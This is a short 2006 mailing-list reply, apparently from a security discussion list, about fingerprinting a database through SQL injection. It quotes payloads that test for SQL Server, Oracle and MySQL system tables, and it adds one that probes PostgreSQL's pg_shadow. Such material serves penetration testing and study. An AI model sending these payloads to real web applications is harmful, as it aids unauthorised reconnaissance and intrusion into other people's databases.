RE: SQL injection (or not?)

From: Tonnerre Lombard (
Date: Thu Aug 10 2006 - 00:31:08 EDT


On Wed, 2006-08-09 at 12:01 +0200, Isidro Ramon Labrador Rodriguez
> Parameter=[valid value]' and exists(select * from sysobjects) and 'a'='a
> If it returns a valid value the database is SQL Server
> Parameter=[valid value]' and exists(select * from user_tables) and
> 'a'='a
> If it returns a valid value the database is Oracle
> Parameter=[valid value]' and exists(select * from mysql.user) and 'a'='a
> If it returns a valid value the database is MySQL

Parameter=[valid value]' and exists(select * from pg_shadow) and 'a'='a

should tell you it's PostgreSQL.


SyGroup GmbH
Tonnerre Lombard
Loesungen mit System
Tel:+41 61 333 80 33    Roeschenzerstrasse 9
Fax:+41 61 383 14 67    4153 Reinach BL

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